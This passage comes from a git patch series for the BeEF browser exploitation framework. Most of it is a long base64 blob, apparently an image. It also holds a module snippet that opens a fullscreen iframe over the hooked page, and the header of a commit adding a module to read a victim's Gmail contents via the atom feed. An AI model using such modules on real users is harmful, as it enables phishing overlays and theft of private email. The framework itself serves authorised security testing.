IQ2DsXWtT8VSUOpSMxmM778bjH++d5HSDh3ERriMjq9jp86Tes9Wj9IoEgNUl+FPVD7aE3T6vVeGckpiNx7AJPGjy5B2i0WCzIys+DpUTQMotPp0LtHBB64dxLyYMeRI8dhycoms0vwkwl0CPuR2SV8Tp5uCZD6KEysL9CarDUYtAkXLmIfbfKpk+6Bu8FQBAjn6bnI3fsRGtIIHh7uRVWRt1Gkqoy+axguJiThzKkY2PJtIOCF0dMP0BqogiROnnIJkPomnEaSQ+surbs7LkSfwfGYc5hwz11wc7vRPis4KBDZOSa888E8WPPz0aFd6xJvFBbaiLTJRLTv0BbHCCTJly5z8iO0Wm1LlZ+0o3UcHNGXIgFSj2QXlOzdPlp3A6IPH8OxmLOYMHYUgURfBAARXTrijXfnYMHi5ehKPzcKDixK/jQadO7YDrMemAodmWS/0XvlpqVzKr2OnutKh8xirk/rEBSPmhQJkHohG2l1oNWJNUn0oSO4EJ+AsaNHQK8QbyEN/HwxbeI9+HXXPjz53Cu4lpKK7hGd4ONtLPJm7gS0YUMGYOK4u5GUmoYTx0/BRlxG6+bG9hlnSt5PK43WMVp2efolQFxdeJOupcUBkTYaAsnR/YdxODoG48eMgKEQJ9Hr9cIE8/Pzwdt//xe+WbQMdtIcXUhzFOcnQYEBmD55LHoSmT/OFY3EZbj8V6PV+tHTTOTvhBJovCIvgQSIq4tF1SSDyBxqqjG44fRvbG6dw3gChMFQtKVv/z49ENGzO5YvW4k1y5djydrt8PX1RkfiIEzsC0u7Ni0x84EpcPf2xv6Dh5Gbnsm5XdAA4So/YbOLqxhlfpcEiEsLE/bVtAYKkJBGOH34OI7S3X+i4CRFQdKhbSvccccAbNq5F7GnTuKXVZuw6dfdaNYkFK1aNi9yrIFeO2RQPwG2c5fjcfZ4NGwEEa1Ox0SHPV3joQQZpbdLAsSlJZvWKqFJgKbMSU4fPYG9vx0X3Rm9i/GNZk3CMOzOQdiwYzfSUq4jPu4KFpLZdfhkjCDswUENixzPHjGuOwkm0r977yFwERdrKwJksKpNrLSi5GWQAHF1TfILrcHgOhIi3eeOn8SuA4cxdszIEsHEkEZBGD/2LmzduRtXE5Kg9fTAyd+O4rvFy5CemYWe3brA0/NGoJG9XZxuz4HJ42fO48LJ00xumJuwbTZc5UJb1M8hRQLEZUHCmoTzrMK1ZG5dijmPrVF7MGLYYAT4+xU5mLN+hw0dhFXrtiD12jXofbyRl2dG1NadWLJmE4IaBgiNwuBwSMMAf9w/fQJH37Erai+sFiu0imu5vWpy7YTMFHa6yFws5woT6AVQG8txKW67Lh2xask3aNO65Hk+fPQkJk57BBcvXoLeizSN3Q7O94LNhnGTxuK9t14h7lIy0Lh6/RY8/vQfkXj5CvQ3zLirUOrit8nLIDWIqwp7lpbQ4tSRHqxJki8nYNP2SNw14k6hBYqbW3379sTylRuQTWBijaBl84lWNBH+BT//AgPxGjaxtNob7QO4uvHuu4Yiav8hcNoLu5pJ1zBSeDrWQVrn5aWQAHFV4f5YK2mJQB8T96t0p1dAMqQESJo2DkXv3t2wcs1G5GRnKwAh00rrYYApJxcbVm/AroNH0L9vjyKvZQI/ZcIYIvinifOccoDEXTW3mLhfkpdCAsSVhYmzwQGSZALJxm2RdOcvqUlahDdFh/ZtSJOsFxnBWjU2wk2zOQZy7kQ0fly6Co2bhKFrp/YFrzMavTBx/CgcjT6DmCPHwX8HSkeVEVCCmTKXSwLEpWVrgSahjc6lu7sOHsakCaNh9PIsciDXl/BUq+W/rBWheodJxTydPWPZmVlYtmwNklPTMGzwgILcL84m5lyww6diEEOcho8lYa8AN7PjFkYyj0sCxOU1CWfpRvAdPv7MecRfvYYphdqaOqRr5w4wEuneuG4zJy0W8WIJ04s0yr4du7CDuMfQwf2FN4yFI/dj7h6GbVF7EXcu1gES5kE8EOgXeQkkQFxddkDxbAXRLR9HSYuENQ1Dz+5dSxw4oF8vxCdexUHa7Npi+VoKN3FHLJlUqzZuw6ABfRAW0kg8x0VaQ4cMxAriMmkpqQJQUGIkXFd/WF6C6ol089adcPufpfyDNS8PzcKbYf/O1SWi5yxZ2TkYMXYG9kbtgd5oLPXNrDkmNAwOxIKv52EUkX+HMEAm3fsoOI7IHAZKy6GBKlCkSA3issJ9sUaBo+10d09NSEJQaCMM7NerxIFsMkV07YiFS1Yh12wu4uItMLmIe2SnZ2Dl6o3oFtEZbVq1KOAy6emZ2L0jykHafWnxRV4hL4EEiKvLINXsgS0/H9kmE343874iXMMhjUNDkJ9vwzYypVROUQpI9DBlm7ByzQZ0J3OttZr0yHGTFes3Izkp2WFqRahcSLp+qyiyeXXdSUdaNzrPkZY4f/EyEhKvlvmCF37/O7Tt0kGYZKWKHdB7uiMzMwszH31edIBkYTfyK398llFYYErT+pO8BBIgripM0Dk1PqQQ/ePBoKQl8st8ka+PD555/GHAYi37nRkkRNCTE5PwEIEkPiFRPDxj6gR0791DSV1RhDun9JKXQgLEVc5rG1p0G8evqv1f1BtiMaNpWIiIiJcnPOUqhEdRlwcSEs7lOvXbMTz70mvid65YfOTB6YXBxQUqs+SlkQCpE+4GJfeJ24g2U+/MrCVeovUVrf20jtKaq/KOIufZZrMBeWY8QvzDvQx+UcBFCESi3am54gJCna8PVixZiQ/nzhe/Txw3CsFFwTVWJexSKil6eQpKCNvrPupGYh8sD8ZpCiXwFqqCgh8PUJe/eneulHCfXrKt8MTzT+DZJx+u1Gu4Q8rKZasq/uBM9t3d8c9352D0qKEiE3jwoL5YsmiZCDxCKdtlwK6Sl7nyAOkJZWgMl2/ebmkJjdRNw31EOcmpnaoRuGKPbR9fFTBVFrvdXqAt7BYLt10UhU7tO3fAq396TlQKVlb8SDNUtp+Jnsh/WlIy3vjnbCz+/jOMHnEnlvy4tPAhoyRAqgaQt1TvylnVNGB7eR2UctJbSfgu30G9IXCeUg9VOwRX19QUphL/y2Cw0conU8ZKpJuJN7tXabN6e3ujTavm6N2zm2gNxC1+iudhVSSnTtOl0VYep1pvI5auWItdew6gV48IuDfwJQvN4mgQESG3fdUA8iWtMaSf29rM5rZ053tAZzBwm02etfc1lLrn+iq8+e9QbwBcEtscSoZteU4hUbCkaAA77PSzVsclrjp6zIZ8drny4pY8Hh5wMxhEwiBv+qZNwtCMbP4W4U3QnP7l4F27tq1E3UfhFqVVkcysbETRRuex1JUGiFYLa042/j37Uyz8Zh6CAwMRFxcvPrN6DthMTJbbv3IA2cA3KavZ3KFH967IyspCzPFTLfTe3p/T4zz45XeoXwEm5g93QamuG6byhLLsIMUEoo3PP9tt+dDQJnJz94LenTa/hxe8/ANhSktBemKc0BJ9+/fG8DsHCa3AG9/f1xcNAxsiKKghvAkkxdv41FS+/G4Roo+fgr6KWkdLx2/YuhMno88gvFljxF285KBKYar5KAFSSYCwKbUD+bYO3G5m3bLv8ewfX8e6X9ZB5+09nHjfdihFOMdd/LuwW3UWlE6Ezcs0i8gM4ig2GywMBg9vP3j4BcAYEAyfoDABCH7M3ccPnj4NkJ12DXu+/wj2fBtmv/8m/vDc43X2hbZsj8Lf33hfmGpVFdYi5vQMLF66kgDSBJH5toKnIKfwVtmLtVlrcHtq/6GjQqWvXfotHnr8Rfzw5QJ2HbYgkKxV78quOGePUzdeoDWdlldJJWGDzWoVJpOOzBSjfxC8g8PQIKw5/EKawqtBQ3j4+BdU8hVwC7tiXp3Y8BNMCXGYM/cDvPjsY3X2pRYuWYknn/0zXY8s0mbu1XsTet2GzTvQggf+FNVsIXLrVw0gJ2hzmPNzsg2/7t6HiC4d8PVns4UN/sNXP0Lv68NuTm5GMBLKgEtXENYSr9J6sPgdkcFgs1oEOAye3gho2hr+TVuhYbM28A4KgbvRV6lE4uNIm7BplW8xF/MGeeDiwZ24emQPJs2YXmfgiL14WTS9/u67xbATMa82OFSP1plzsbh2PQ3aolooQ279qgEkjgByHtb89qdjlBku3Ij584/fQ2JiMjav28ytadjrw6h55CZ/ZgbD87ReQbGgF292Bgbzh4bhbRHcpgsCW7Yn86kRbRZ3MpPoeZu1BBiKCxNyU2YaTkeuhzEoGG+++nKtf6kTp2Lw+dc/4vuFS0Wmr9ZohE6rqfH78giGq1eTC8p4Hdxfbv2qAYR5SDyhoj0PgHEINzD74tMPcOddUxAbe4lzftjG56zQH27S5+1D6zMoLtobwCATije+l19DhHTojtAOPch8agYdgcKWbxFDaqx5pkr/ER1xsfh9e5CXcAGP/eFFdClUB+5M4bypTVsjBU/YvnMXclPTofH0FH2ynCVsNmqKgiNdapCqA4TlItupVxKvisYBjt6y4U0b4z//909MnP6IsM2J/L0JJU5Slw0BmFjybfytwuaUjUwjHhXgE9wYTSP6I7RjD8Ep7DY78gkYVQHFDe1B5DYnC5eP7IWOuMlDMyY77UtwykfMuQvYuiMK6zZtx579v+G6SC6kTezhzqZsnVhxtBLk1q8WQLRIInWcm2cu0nx5wj0j8fgjD2D+Z19B6+vTUjVv6ip9mt20/6U1rRDJoM2WB0/fAIT3GoJm3QfA3dtPmFdWc17NkKjT49r5U8i8HItBwwajT89uNXo/nll44Lej2EhkefP2SJw8dQYmHpTDd3biF2VVDNai8KSsPLn1qw6QK3zRTKZcpKdnlBj08q83/oItdIHPE+nTe7j/nh5aBKVJWW0K2zYLVU+VyjOsIprXpGs/tLljDLwDQwSnsOY5J0tGo9Hi6tkTQL4ZIwkgpRUzVSSpBIDtv+7B+s3bsXlbJC6Q1rDTTYej61z8pPc23sxrvlZu+2oChDdDntmClOtpaNI4tMiBPODlH6/+AQ/Pepa9RJ50LHuQJtfiZ7tDBUdjxwP5pDUMRl90HDEZjbv0FV4qZwHDYV5ZcrORlkA8zOApOodUVq4mpxAYfsWaDVuxI2ov4mPjlPwr0hI67shezUi6k4VNq81y21cPIDmsQZRRxqU7OR66bzIW/bQC61Zv5LsgZ9txCsf6Wvhc/L4LUCgKzkBo0Lg5uo59EH6h4WRK5QpTy5nC2oP5R0ZyIoLCQgT/Kh8U1wgUUfhlzQZsI43BbUZFFR/xCe4+ovV0uXjc97QS5bavHkCyNOwQsli06RmZZXpE3nz9j9i+czdMBCS9TvcGlGbJzrRpp6leMoNCN+xCc4R16Y3Oo+6Fwcu7WuS7shokJy0FNlMOQtq1Iq1ZsuNITk4OttH3X7RsFTZt+RVJnOPEgUUCg87Lo1omWR1qj0/llq+BBqGLa4LVauQa57Kkd48IzJp5Lz77+HOuCe0LJVfrMyd9nklFwEEbjz1VrQfejbZDxoo7fEUxjBqqEDKxcsSG5+TCwqPUOKdpAWnPJSvWIOZkjKjpYM+TzugFTf241q9Dtv6pEUByOZpOJMSYcj213Bc9/9QjYrwxe2j0ev1foHQ0r2ny21Ao1XgqOPKFBdVx5FS06DNMjWfUcmKxXS060nC9eD5pCxMi9+zHp/O/x9atkchJTeVen9ARMDSaepXOxFnZX8rtXnUpXAfBwULBeDMKaZBsMikushlR2LXUrjVm3j+VdI4wdbjg6Okafg4uWf2ZVgPFU5UvTKtOd09Dy34jkG81C21S66JRTDoeUhN7KQ79R0zE2AkPYfXyNTCZ80ScglM/XNiMKk04ZvWc3Oo1B4hJAITs8JSUGxqEs0JXrN4gJiAVFs5qDSISa2VPjZL60bqan4HjKouhlLEKIPD260R8o3mvO5FfC2S8bA1iFynunLiYQTzsxLFTYiYgu2WdncZeR8KlDNNx6xW/3TQNYmKAJCVfK3iQe76eP3Mei5esLPJCbtn/2KwZ9AqhdHhzv1qNv++vgqOlg5Az52g7dDya9x4ign72ugKHCk6OxHPeFmuJeqgtCgt7Aaew80Vuc+cAhBs0cZ9LJCYVpRPBIY3w79mfED0pqkWefnwmGt3QIrOgzKWoCv/5CoV6NeUTIMJ7DEKrfiPFz6hDcLADgDWHJwHE2LCRAGo9FbN6s5opNYdzAcJyldNN4q8kKnXWqjRtGoZTvx3Ewp+Ktnfl6UhPP/EwaZECt+tsVL6tzAe0JhaAw2JGQHhrtBs2UWzOutIcnFrC2b/5VguuxhzDqU3LYEq/DmWIbL2T4+pN6h0ok66kOBkgyaxBOFUiqZAWCWxIe17ngTnzvhSpKIXl2admoWXH9rDmilAI9/OfU4m/+0daLxY2bXiTdhg+WZS72uvg7u0Ahik9BWd2rsWeH+Zg/0//xfk9m2HOyRQxkXoknJ37Bi12u/8qt3UtahDeGGnpGbgcfyPhs4Gvr0jBPnrgEL5Z8HORF3Af2H/89SURQVbv+tzs6e1y/uYzqvZAYe0R3nMwApq1EUHB2jalBDAyUhG9ZQV2fz8H0VuXIzMpXjgk+Dk+pp4In/DlKjA4y1rOSq9lgMSytyaPNMj5izf6NAQQCETQjMyO/8z7Qnh4CsvM+6dgyrQJyE8vKDNgG/hbKF1FHMJFDh/S+qTwazm24RUQJADC2bi1KTo3gzDfzu/ehN3fzcaZX9fCnJ1JoPAk/uGmVBnWH9kLpd8u58NFy61cNwC54vjh8JETRbSESH93d0fMiVP48rvFJd5ozntvoE2XjrBmFfBCJolHoOT/cIrDb1Bac6I4QJp1GyhqxWsrEKh4pDyRdvkC9i/8BCc3/Iy8rAxFW9Q/rnFW1dI8FGeD3MJ1C5ALwgtCWmTfwSMFD3p6uiuTWZkb0F14zkf/w+UrCSUI+w9fz0UIEXoraRK1qRo3B+CacQ4ktlbMKYuoABRBOXo/D19/hHbqKUhyrYBDTFrSI3bfNuxdOA/XL52BjoDBj9Uz4SRDrsPhasrvoHgdpdQxQM6AKwXJnDp6/BRiL11WAeKJ0EZBomOg3t2AuPOxeP/DkulXXFy0Y8NSjJowho61EVAyYc3OURZpFiuZZiEhjdC8eTORysGgaNS6M7wDgmtFe4g6bLvSmeT4uoWwEdfhMtzCYs0zi8i9CwvfaT5XgfEeZD15nYq+FG/ISb1eH3rtSiL27DskOgTqiLw2DgtV2mryXdnohf9++QPumz4BA/r0LPIGbdu0xNql3yBy935s2LQDMecviBkYIcFBAkAD+/fCrCdfFsFHrpMIad+9Vly6rCGY/B9Z/T0SThwUwCge9OPBNF26dMKli3HIIADr3FxOq3COzxOQRU4uAxAWdhMOZwfJspXrcd/U8eLBls2bFgTumMhbSCu8/Oc3sWnNIngbi7ajYm/Q4IF9xSoua9Zvwa4o4pd6nQjINQgLd7r2YM3B+VtHVn2HhJOHBNcoLqzVuvVijbcE27ZH4b6Hn0EumX5610kp4T7JM2idk9vUdUwslvVCrdOm2rR1J86pXU66d+0kOvw57vZ6AsWeyD14/a0PqvQHRbCRI+9k+nBrHq7vcGYioiN+cXLjzwSOg6WDg8yqwOBAfP2/D+Hr440J40bhH6+9DOS6TKl2DK0JEhyuCRCuMz/IfbHSEpLw+VcLxINdu3SEu9FYxBzSEkg+mjsf/1OPqUg4vvIrN2ImHsMbuWHztk7OJtFAqzfgTOR6XDoUVSo4xMgzAufH/3kH3bp0LHj8qUcfRJtO7QR4XEA4+VN2HnFRgLC984XKzvHVt4sEWefxwp3bt4Gt0AZiU8qu0+KFl17DNwuWVPjHeMjkpUvxAhzc99Y3pAntVeeZV5xcGH9sL85GrhMxj9JGe9jJtPrrX17ADNV0dEgDP18MHTygUpOcall2QrpvXRogLAsEWSfSei0+AW/860PxIHf5gKWoO5YIPfKIQzz6xEv42xvvi5LUsmTLtigyY0ziDm4MDIGnr7/TPEgMiLT4WDKtlhQxtYogPyMT46aMxZuvld4psWO71spsj5srJ8t6grV3aUtK3ZJ0Fo72cYnmUh7G8u13izF+zEg8Ous+zJk3HxbaRIWH2+vd3ETc4923/w/LV63HA9Mnol+fHvAh+54v4OX4K9iweScWLvlFtNS0EYH2bdREmEO2/JrXl3Osg0tlj69fJCLjulI6iLCbuUvPbvjqs9lw05f+tS0WlxiF0qi0B9k0LCv1vh6n5Lu8aPQNWpT3PA+hfNZqtpAJ4oPtG5di9kf/xfdfLyyzPSYPmLHT8VyVp+OuHgQcq6g8tNPvnuLOLgKEZGL1nPak6IpYoxQT2hzctf342h8Re2BnmR6rxs2aYOPqhejYvk2Zb/XgYy9gAZmUN7lvVRqt3lAi5kL45hMYEIAVi79AYMMAMT6ahcdVxNHNZ8zkh0UpglYrZ7LWlYnlEI7cbubgYNr1VNz30FMY0K83ApuElTnfW8fdAgk83CBNNJMmDcIeL+4g6DB7+I6fff0qzkatr3HNBxc3XT66BxcPRYqfS4CDwBnatDFW/PRVueC4kpiErTt2CQfCTZYGqvZWPj+ZtGGhjbBjw8/oT1qZB/d0IFOQV6uW4Wjdsrm4SUhL6+YAhE2tB+nsH+A53NGnzuDd9+fC19enwpmSrPb5jlbWXY0Dd9cuRCM7JanaaR/MOzKS4hG99RcFfMUDgdnZCCMwr1zyNXr16Frue82Z+wUSuEG3m5srXBfOY1Nau9oVnseN+6S4DgcpLEngGYZ2+zd6T48xcVcSlLTwGgbUOKXcYjIhJz0F3kGhVc4s4tezaXZq81LkZqSWMK2YkHfs3hU/fjMPEZ07lPte88lk/JBMR215Y84IfPm5ubCLPLJatPn5vRnsOt37Wp2OAzMfSyLu2gBh4eoprm9+V6fX8zQn5+wQeheLqXolDEzEz0ZtwNWzx4uAw7GZHn/mUcx+5zXhKChLeJrWe3M+xfvvz4OduUw5Nnw+ASOCAMccIL+WPF2sdXkabVpGBq6TSZuQlPwRcrK98k2mf9/EPcLzDDnptK7dexyhLr45/KC0oq2LOwbvcWtVbBsuJeR0de6kyFWDLZ21KapjWrFL99yujYKgF9nIRGgDGvgJvnE+Ng7Nw5vA6OVV8I1NebmIPn0OG7fuxDc//IwzJ6Kh4+GbFaS92025+Pebr2DUiCG1elWYkHPVZg5p18vxidi2c9e7kbsP+Fqt+X+7SQDh0Vrvou7q2/kuxakV3H42sthzjpa0eXUAEt5Y16pj/HN7E87X+gOUfkt+NfkUOkPVRowx1+C+vCc3LSHtk60GBAupRDL9uDv9Sy/+DQbSHpymHxwcKPLHePMlX7uO5ORrYsAl17fcZI9Vyd1B389o9BKLW592j+iE559+5K9kUvJ02mdR911KHCe4rk+UvoxNy3cyrzr6DF7VTV9NVT0t30CpLeekuoZVegcxVNMg3L1VsbEZEKw5UmJPiyKoskDEG99CZlFCYhISCpUPc1MK9qLV0bAa5+wUJW7zsLoxpt8m5r9LEK+aOs7PqVqE53f8HYV895UxJTx8fOFu9Kl0siKDIzX+Ai7s3VpCc5R6PGkN9krpeXqTY3F8Rldv4wXTVC5YIGs3boOJtKFWK4OFrggQh3Bl1T9pRUCpkV5RkSnAwUJOdxcapBJdTFgrcH0HN1pg00pTP9vyOEOmOn44feY83n53jhjxLKPprg0Qh7DXgbtscJf2Lqr5FVWaB4SH3/B45sq219G5uePioV9x7Xx0lXnLLSYRqr8BK39Zi7gz0UIzSqk7IuQsiaX1kbr6qsAJVcBhF/yB091tlTCvuONIRtJlwT20etetJV/6yzp8/N+vRLvWqtExuzAHR4+8E0/+7sEiYxdKESbLfsdORKe9N3c+4O2PmxxG5/Y3PJIvWyXQNRWNyj+OVuO1nLPEZclpTvgsfOc21dVuu1CYdHGAL6BpKyUPq6JqQo3o7oCY7SuRl5leaq6VqwiP0N65fj3gZqx6pMhmx7plK+Hj44NZD0wt94zk22zat96ejZS4eI2+gV84AYQjoZxU10j19NjLuOA8mZjHQHMp73n1utS0Soxr5LfCNXpy8WaaByW47fIapLDwfPOwwuYVzzPXE9GuaCot51fFHd6NxNNHRL2HS6tjTlNx86r2UB1rhg0HDx2pCCA5Pyxcen3JoiW99A3836STeSeq5/bkuy3301oGpVdZdee7aAHcsgSorgBSMOyTNQb3wOJmDRVpD87RMqWliAZvCldx7etg5WIrSxbyM+zV0CA2oS0HDexTvt16Me7Icy+9NhU+vtz6x7MGH9dN5Ym8uDUTu48PVeN9bHARl2x9BQir/dE3zCsrwjr1EmMGKppQy80Xzu7aIBIaXdm0ckiXzh0wfeYseFRR0yljH+wYPnQgpk0aW+6xOyL3mDLT0ubqjUZPJ370VlDGUPRTzbCqCPPK91VTraZOH8dthTM1Lt4uABkHJZdHxDsMnkaEduxZYSWhku17WphXOtcYoVyh3E0km1dtSZ7ZHPnRx583pDtHSCVfYlY3XWVSlLmxH8+b/KCKHytAJenOlJ+qCRD+nm+qvEhXQ6DyBn2nLgAyozA5D2rVkch5WLnmlYh55OXh9I5VovqQXby3uTA/WPzhR//77LdDRzfqyk6P2QVl5spF1fRJVe/qfurmYTL/JK32Zbx+fDUAUhtS3TY3evX7OUMYIPNqGyDs3h1S2CMV0i4CWq1eaT9alvYg8n7+wGakXjp7u8c8HMJep70x52I7kD3WWFP2MRx/ulrO+3AzCA7iHkShGfSFpIP6+HV5yuvGxJruUHV2kVrih4DwNmJibZm8Q69H1rVEnNu9CRqdTl4hRTiV57t+fXrkfvPVAqIsdk0pkXN2s/YsZsuXoDtQXKFpZQCEiZ6/BEjdAITtgImFzSv/pq3EiDObpWyA8IXntj2lFUG5utS0sKmCdBGN2WLxLCcoyPXENW1RymaYd3W+upNOoeZ2AAifZE6VHYPCNSN08YNbd4GWKwHLIeZXzxzDlRMHSq0vd3X5efkafDh3Pjw9PaoFLv8GfpgxfQKml+HJSk5Oofu/tTbzrvja+VbxNbGq3Z8F50TSWU7cigBpCqXR8hjVI+LLEXBbvk1oD4PRB/5NWpbpvWJizjM7oreuQH6uCRriIWJmOde2czJePUhOvBh3GXu3b6teJJ3FbMbaNRvRtnXLIl0fC7SwzSVDDpxiEgnXiKTzCeI5NOYaaiN2bLCZk+csgLApNZ9WIHunePEQTNYI3gEBcDf6IrBFe3j6+ZftvWLTgVb7YZNEj6s8MrGy064hJ/UaslKSCDxpAlw6nZvLchMxS13rDo2ne7Wujs3dAHNmFuLj4ksFiBfXzJc9Ho7jEHE1QJBW9dzkVON1rmIa8Tm4By6WajIMSpDJwPM+fBqGiDQSduV608+sOQxeRmFaWS3mck0MNw9PMsM6Kedbo9jknOLOmiXzajyZX8dFDTo3euBiK1cbtMnfEW56UeBU1R3D9wctadyhE0ZjwIDSo+kB/v5cPVWgWYvJaVp3qnc+bQV2fo56nLPu2jKSXo7wxFoDm1G+wY3Ra/qTAhgMFtEa05YvXLq2Sm0SuwBEceLK3i8m943aRiCHtErc4V2IPbCj1JLbmyn3E3+4gzZ3dRq48Xf38TaKGnq3MloPNQxoIABShniqGqAyJbmMwIhiIHFk0XJ3/8QqfHTOsZsH50TSHWJQecj/1XeA8JDObg77uGm3/gIcZpPz6vsFyJi3qNyFC6zaDZ2A4LZdcWLdQtG8wVViJcFBgWLVlnTp1B7unh4w0w1HV1KDsBeL406bKvFWPEd9eCmPs/07sIoAYbfwI7XwdXffCgDRC7TTJmbOYfDyKUbCNWQGaUQPKzaH+F877BXXL4iLrxEzEfOZsxQ63sFx/EObofd9v8fhX75RWv8Y6pdLuDrCXRV7RHTGbh5AVHoPL+74MZvWdijTwhx3dLv6cziU2vbhZfwJ7hHrKmMXLK7wIZxhYjECSINYkZ5wCc26D1QGdIo7vxXWXBNyM9ORm50BM6+cbORlZwrTi9PezTlZMHh6F2pLqhW/cwyEG1z70NIbDIrJVqi4ivmMm6cR3Sf9DgeXzBddGvW3eNSdnQBPPzETu/fsL4uHBNH6twqI4oRPV4nrzZ3l4yHFaQC5BiXvJ4C5QNyR3UKLsLeKKwAzEuOIUF8XzeGseSaFXwj+rSmqLYppFIeWcfPwgh9piiZd+4n0eCbxVnU6ldAmBBo+JmLsA9iz4GOY0q67dMWhM2T4kIHrQsJCUhOTku/Xl/1d+QRX527xH1Q/D0oCpBThuxQnx81l8ynfkoforcuVTU53e2FWqaYVxKzyqplBNtIyKRfPICU2RpDyVv1HCqLOJbiOsdEMOq+AYHQcMRmHln6hgO3WbWCwUavVPqjT6dPpHsJk/DEnEWOuMuRewItc6LtqywB+vTOxPoVSE/AXAoJO8SrZnfJdGFgOLxWbb4eWf4XAFu3QaeQ04UZ2VCPyv43adaMVIYZ21gppp6+Tk2MSHCsru/ZjYt7eRhOBgb0dXJ/BQ+s5BXwlnVuL6lV9Ur053U9rEJSSAq9KnnjmGpwSzhWF3CmTpw7FlQMePjatDvelZxmOAr4pXFVvzPZSTMhsZ2vAiuaDVEVG0loKJc2k1oSLrIwBQYgYN1M0fXCAhIHE9SP7F3+i0iLn3mzYS9ckLIQ3bqUaTdREMrOyLr356svTH5153yXVjC0grIlJV9Fr8FjExydCf2NsNX9ZHpsQUAmAaFQCn1oKTylNPNQNW5exDo36nYu7rPluaSzns9jV7+a0z+osg50/9KzaBof4wGSmMa85uHS+GMAT0Kw18gkkIhmySQsi9k2RfiWWkO/cMQYc24iLu+LUibxlSB6RqafiL1/ZW4XX2NUNn1oLnydXXa4g5kqC2qVMLEY1uxcnlLjrqukj1Qmc8V26zNkitPnZG3Zk5bfoM+NZGP2DxVx0Nq0YMKlx5wRPcboXya3WHQC8ER+zmtzX1cbnl+IcIlRV+WdxcPBdlmcC6qz5MHobq5wGzsDwNBjU0W1lbVY3ZKdcxfF1CwkceaozQAOfwJD6ei3YnBqt3myk3CIAGQxlJMINjmDKhYYAMW7yWCxb8jV6RnRGfm7lWy8xmCwWC556YibGTxwDa2ZWmWYNm1vJ507iwr5tIjdLNKTzNCrao34NnfmZVn8oAT4ptxBAXkOhhgC8mbv16IqNaxZh5eIvhSbYvnO3mFdYec+VRgwBjdpzAD999yle/cefiWNYyhxaw5NyYwkgXIWo41FutnqVO8eBOW5IzZWXV+R2vLUAwnk/IwrAQSbV2En3YPv6nzH0jv7IyzPj729+IOaqV5WD6DzcsSdqH9Zv2oG3X/8jPvn4XdjJXCvNe8S1Ihypv3Q4UgQJ87IzlKm5rh0LYfcqxzB4mu0SuQ1vTYBw2ZvYhTxmecDgAfjx63nwU+du8Lz0g/sPKaOgqyjCRWs2Y9uOKPH7M4/PxOt/fRE24iSl9tQkzZF89gRyOS0+OaG8mombKUzA10EZX9Cd1pdwjSIjKbUEkDv5f2z6ePs3wIfv/UOkazvkp2WrBQ+odjyCSPipmHMFv/7tz8+h78A+yC+FuGtULcKZvWmXzwut4iLC2bHcQeR1FRRcbbkMruM2lVKBVNdvyUGptoJUEymfeO8k9O3VreDJrOxsnIyOEZu8JmIvpC+4W+Hzv38MD+w5WCJRz/FjYvRvovqwumOlnSBsA3I2LHcm54bOm9WfZX7TbQYQTi1Rul8Qv5gyfnSRJ9MzMpGZlcMldjW491oR3rRJkYdGDR+MsGaNceVKYqnzzBNOHSory7U2AcFd0rmnLTdt4+Ae3Rlk25zbHSDc+cLA5pVvwwC0b9e6yJPeRiO8eEaGrQbeJNroEV2KzjcPIFOuTasWuHLxcjHtpBG9tjhYqKl9/mFWwbBG1RBnUHcTYKXUE4CInc/xCV8i5X5+RTNMmKi3a9cKZ0+dBtyrXhJrNVvQsHEoxo0eWYK8K+WopQFPU9uag5MGv4YyuPSE3DqSpFe0WUwO+19TSn7cQ8RLWIPYqhiwE0HBnBy89NwTCG/WuJhSscNsrmlHlyoLe5q4X21XKCnhEhwSIBUKB7XSOb0jIzML6ZmZJQ6YPmUc7n1wGmzpaRV2ci+sOfKzsvEEgeNvf3quJCqvpyLm7AXROaQOhD80p31wO88/QwbyJECqIKw9DnMJaPq164g+XXL6M5s7X376AZ5+8RlhEVmJuFtz85DPjeRsN1Y+kXGOo1jTMxDcKBAff/IB/vvRO6XG+TZvi0Ti5SvQ1X7V4BZaQ6EMlomW20QCpDqidM+gTf79wmWlHmA0euHTOf9C5JblePyZR9G+Yzu4Eydh8PB/DLAGDRpg2F1D8f6H/8LByLV47qlZpXKJHJMJ/5n3Rc1iKxXLcShN8Jj8/Cq3h5Sa3IrZi/O21tPTZ+mKtVi+egMmjR1V6oH9+/QQy5SbiysJV5GcfI2HwQivVEijIAQE+ENXQTrKK3//N/ZG7oHex7s2zgNXy71La66DW0mRUlOAcJj7B61W87TNYsPvX/gbwps0Ro9unct8AY9HbtWimViVlby8PPzptXcwd+58aI3G2jgHDHSe535WbgcpzjSxWLixV5Lew4CE+ASMGv8AFi9d5bQPt/fAYQwfdz/mfvgpdGSaabVONa3Ys/AUlJwyCQ4ptQIQjiL/iUm43ssD11JSMOOhpzB6ysPYsj0KFou1ym/IjRE2btmJqfQ+g4dPRNSOXdD7+ji7Dy93AOdGB/+TW0BKbZlYDvkenHpix3vc4I1jFetXrcfmjdvQoVMH3D1yCPr17i4i4GEhjUSHcg72cRSeV2pquhgbcOZcLHbtO4htO3fjXMw52IijaOlYvZens7/zt7SeUzWIFCm1DhCW91VyO1uj0bjpjUYx1vjYkeM4RpseBBwvP18YVXAEBzYUCY3cPocDf5lZ2bBkqPuVjtUa3KA31EpNNmfVvi0vu5S6BgjLXNV04d6wfZgvaD3cOQ1XaBWTyYQc0U/KjiukMTjJUQnDK717a8k7VcD1ofSR+lZecik3CyAsPGmI69Q5vZc7fnOddRDHLcRwGUeZhludduzg3ko8inq1vNxSbjZAHHfrFepyjEfgUdBcXsr5TI3q8Ptxli3Xe6+Tl1qKqwCksHCbyI3qYmlI615af6XVpA40hwSHlBpJXRdvcxYw9/Lto2qY2pJMFYgSHFLqFUAcwmWpk2m9AOe7W7maj1vprJWXV0p9BQgLF4p8DCVgt9FJ78nJhjxUdIO8tFLqO0Acwk0NxqhEntv5X67Ge3CyIRc1sQftiLysUuoLSa+scHHSTnVx/W53dbNz5mNLKJNUvXFj8Ai3xucCJu5MyN1DVsN1ZutJuYXk/wUYAC5gaikMXNI2AAAAAElFTkSuQmCC';
 	var answer= '';
 	
 	beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);

From 624f704240f6accbddad2ba941d6ec8f3bab8fc9 Mon Sep 17 00:00:00 2001
From: Mike Haworth <mike@marburg.lan>
Date: Tue, 20 Nov 2012 20:46:04 +1300
Subject: [PATCH 102/397] added module to pull email messages content from
 gmails atom feed, useful if running the in context of mail.google.com

---
 modules/misc/read_gmail/command.js  | 46 +++++++++++++++++++++++++++++
 modules/misc/read_gmail/config.yaml | 25 ++++++++++++++++
 modules/misc/read_gmail/module.rb   | 26 ++++++++++++++++
